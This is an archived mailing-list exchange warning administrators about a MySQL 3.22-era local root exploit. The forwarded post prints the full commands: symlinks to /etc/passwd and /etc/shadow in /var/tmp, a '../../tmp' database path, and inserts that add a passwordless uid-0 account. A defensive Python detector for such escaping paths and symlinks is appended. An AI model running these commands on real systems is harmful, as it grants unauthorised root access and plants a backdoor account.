Hello

This one appeared on a Debian mailing list.
I know that this is fixed in the latest versions as they allow running the
server as a non-root user and so it is not considered a bug (....)
but I'm sure that there are administrators out there who are not aware of
this exploiting method!

bye,

 -christian-

-- 
Christian Hammers    WESTEND GmbH - Aachen und Dueren     Tel 0241/701333-0
[EMAIL PROTECTED]     Internet & Security for Professionals    Fax 0241/911879
           WESTEND ist CISCO Systems Partner - Premium Certified


Hi,

At first, an apology if this came by earlier, I accidentally removed quite
some debian-* mail, and I don't know of a -private archive for developers.

As seen on some mailing list, can't remember which one:

$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q

Testing/unstable both have >=3.23-ish, stable has 3.22-ish. testing/unstable
are not vulnerable, I didn't have a stable box at hand to try.
Anyone who has tried this on stable? In my opinion, the whole idea of being
able to specify an alternate database location to the mysql server is a
problem, and I never have seen a real use for it (correct me if I'm wrong).
I'm pondering on filing a bug against mysql-server for the whole
alternate-location thing (bugs keep popping up with stuff ranging from these
symlink tricks to stuff like 'select * from infile'-ish problems that allow
reading from any file).

Greets,
        Robert

-- 
                                Linux Generation
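
An added example, not part of either message above and not MySQL or Debian code: a Python check for the two conditions the forwarded post relies on, a database name that resolves outside the server's data directory and table files that are symlinks pointing outside it. The directory layout, the function names and every file name except gotcha.ISD are constructed for illustration.

```python
import os
import tempfile

# .ISD is the suffix used in the post; the others are further MySQL table
# file suffixes (ISAM index, table definition, MyISAM data and index).
TABLE_EXTS = (".isd", ".ism", ".frm", ".myd", ".myi")

def db_dir_escapes(datadir, db_name):
    """True if db_name, joined to datadir, resolves outside datadir."""
    base = os.path.realpath(datadir)
    target = os.path.realpath(os.path.join(base, db_name))
    return os.path.commonpath([base, target]) != base

def symlinked_tables(directory, datadir):
    """Yield (path, target) for table files that are symlinks leaving datadir."""
    base = os.path.realpath(datadir)
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if not name.lower().endswith(TABLE_EXTS) or not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([base, target]) != base:
                yield path, target

def demo():
    """Constructed layout: a data directory plus a world-writable scratch dir."""
    with tempfile.TemporaryDirectory() as top:
        datadir = os.path.join(top, "var", "lib", "mysql")
        scratch = os.path.join(top, "tmp")
        os.makedirs(os.path.join(datadir, "shop"))
        os.makedirs(scratch)
        victim = os.path.join(top, "passwd")      # stand-in for a system file
        open(victim, "w").close()
        open(os.path.join(datadir, "shop", "orders.ISD"), "w").close()
        os.symlink(victim, os.path.join(scratch, "gotcha.ISD"))
        hits = [os.path.basename(p) for p, _ in symlinked_tables(top, datadir)]
        return (db_dir_escapes(datadir, "../../tmp"),
                db_dir_escapes(datadir, "shop"),
                hits)

if __name__ == "__main__":
    print(demo())
```

On a real host, point symlinked_tables at the directories local users can write to and pass the server's actual data directory; any hit is worth checking against the account the server runs as.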

